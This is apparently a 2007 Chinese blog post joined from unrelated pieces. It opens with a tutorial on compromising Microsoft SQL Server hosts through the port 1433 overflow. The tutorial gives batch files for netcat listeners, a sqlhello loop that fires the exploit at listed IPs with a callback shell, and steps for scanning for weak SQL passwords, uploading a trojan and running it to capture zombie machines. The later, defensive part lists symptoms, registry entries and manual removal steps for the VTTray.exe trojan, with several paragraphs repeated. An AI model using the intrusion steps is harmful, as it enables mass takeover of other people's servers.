20071205 VTTray.exe 1433

20071205 VTTray.exe 1433
http://www.yippeesoft.com

笔者Sam 是黑客技术研究和安全的管理员（21183991 ）如好了，说正题了。 sql(1433)溢出漏洞的利用。用到工具：nc，sqlhello 用nc监听： 写成如下的批处理： @echo off @start nc -vv -l -p 2004 @start nc -vv -l -p 2004 @start nc -vv -l -p 2004 @pause 附：nc的用法： options: -d detach from console, stealth mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound conNECts -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] 我们用到的几个参数：-v -l -p －v （verbose）是什么？直译为：详细的意思。我理解就是详细的信息。很多时候这样用：－vv －l 是什么？就是监听的意思（listen）。－p 应该不用说了，就是port的缩写。 好了，nc解说完毕。轮到说：sqlhello了这个工具是输送溢出的指令的。。 也写个简简单单的批处理： @for /f %%i in (a.txt) do sqlhello %%i 1433 10.10.5.245 2004 ％％是写批处理的时候特别出现的，如果在直接在命令行下打用 ％ 就可以了 这个批处理的意思是：把溢出的指令送到 a.txt里面的ip 和对应的端口来本地监听的是2004这个端口（用nc监听的，刚才说了。）

5、扫1433抓肉鸡之方法2 
要用到的工具：端口扫描器 X-scan SQL综合利用工具
上面我们说过了，1433溢出现在成功率已经不高了，所以我们可以用另一种方法。  
开了1433端口的机器一般都装了SQL，所以我们可以猜测SQL弱口令来抓1433肉鸡。
首先先用端口扫描器扫一段IP的1433端口，然后结果保存为文本文件，接着用X-scan导入这些开了1433的IP，然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了，其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏，只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告，列出了有弱口令的机器，然后打开SQL综合利用工具，输入你扫到的弱口令来连接，接着打开SQL综合利用工具-利用目录，上传你的木马，然后在用DOS命令执行你的木马就OK了

最近这个木马较猖獗，症状是“开始”菜单多出一个名为 carlton 的快捷方式（也许没有），系统根目录下（可能会）出现随机名字的十字架图标的文件（如下图），任务管理器里有可疑进程VTTray.exe（一定有），网速明显变慢，甚至打不开网页。

这个病毒要是在要是在一个公共网络传播开来那很麻烦，本人所在的公共网络有70台电脑，大约20多台为ME系统没有问题，大部分的2000感染，中此病毒后，路由显示有2198台电脑（而且还在不断变化），这显然是该病毒发送大量的IP包造成的。

如何处理这个病毒，请用下面的方法：

抽掉网线
开机进入安全模式，停用显示名称为 s3contrl (32-bit) 的系统服务（可能停不掉，我重新装了系统）

进入注册表，查找VTTray，删除所有键值和子项（有多个）

可手动删除之，先终止该进程（如果在安全模式下出现的话，如果没有出现可以直接删除）然后删除 C:\\WINNT 目录下隐藏文件 VTTray.exe

VTTray.exe       可能当时删不掉，终止所有其它应用程序后再试试看，一定能删除的

删除根目录下如C盘下随机文件名的十字架图标文件和“开始”菜单里的名为 carlton 的快捷方式

本人曾简单制作一个免疫包，但是马上被该病毒破坏。

瑞星可以杀掉，但是马上会出现，出现的时候瑞星有进程VTTray.exe修改注册表的提示。

该木马依靠猜测弱用户密码传播，给你的管理员帐户设置一个复杂的密码也许可以防止再次感染该木马。

最保险的方案就是安全模式下杀毒，然后按照上面的操作，停用其服务，删除文件，然后打上所有的漏洞补丁，给超级用户设定复杂的密码，就可以防止该病毒！

建议维修时先维修装有共享打印机的电脑，这样可以先保证打印机的使用。

C盘下还有个随机名字的十字架图标的文件吧

“开始”菜单还多了一个名为 carlton 的快捷方式

VTTray.exe注册了一个显示名称为 s3contrl (32-bit) 的系统服务以实现开机自启动

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\s3contrl (32-bit)子键

最近这个木马较猖獗，症状是“开始”菜单多出一个名为 carlton 的快捷方式，系统根目录下出现随机名字的十字架图标的文件，任务管理器里有可疑进程VTTray.exe，网速明显变慢，甚至打不开网页。

这个病毒要是在要是在一个公共网络传播开来那肯定又要搞的网管头大了地

？？？是不是 regdll.exe 的变种 ？？？

VTTray.exe注册了一个显示名称为 s3contrl (32-bit) 的系统服务以实现开机自启动，以下是它改动注册表的地方

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\s3contrl (32-bit)]
"DisplayName"="s3contrl (32-bit)"
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):22,00,43,00,3a,00,5c,00,57,00,49,00,4e,00,4e,00,54,00,5c,00,\\
        56,00,54,00,54,00,72,00,61,00,79,00,2e,00,65,00,78,00,65,00,22,00,00,00
"ObjectName"="LocalSystem"
"Start"=dword:00000002
"Type"=dword:00000110

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\s3contrl (32-bit)\\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\\
        00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\\
        00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\\
        05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\\
        20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\\
        00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\\
        00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\\
        00,01,01,00,00,00,00,00,05,12,00,00,00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\s3contrl (32-bit)\\Enum]
"0"="Root\\\\LEGACY_S3CONTRL_(32-BIT)\\\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001

注：红色部份是导出为文本时的数据，在注册表相关位置，其显示为
"ImagePath"="C:\\WINNT\\VTTray.exe"          数据类型为 REG_EXPAND_SZ

360安全卫士不查杀它，瑞星卡卡也是在未知病毒查杀一栏询问你是否删除

可手动删除之，先用360或卡卡终止该进程，然后删除 C:\\WINNT 目录下隐藏文件 VTTray.exe

VTTray.exe       可能当时删不掉，终止所有其它应用程序后再试试看，一定能删除的

删除根目录下如C盘下随机文件名的十字架图标文件和“开始”菜单里的名为 carlton 的快捷方式

最后找到注册表该位置 HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\s3contrl (32-bit)，删除该子键及其下所有内容

该木马依靠猜测弱用户密码传播，给你的管理员帐户设置一个复杂的密码即可防止再次感染该木马

历史博文

• wpf显示GIF - 2009
• 蜘蛛屏蔽 - 2009
• 20070417 cmcc wlan kav kis - 2007
• 0419 Compiler Error C2275 - 2006
• 互联网电子公告服务管理规定 - 2005
• linux 安装 MYSQL 2 - 2005
• W32.TOXBOT NETDDESRV - 2005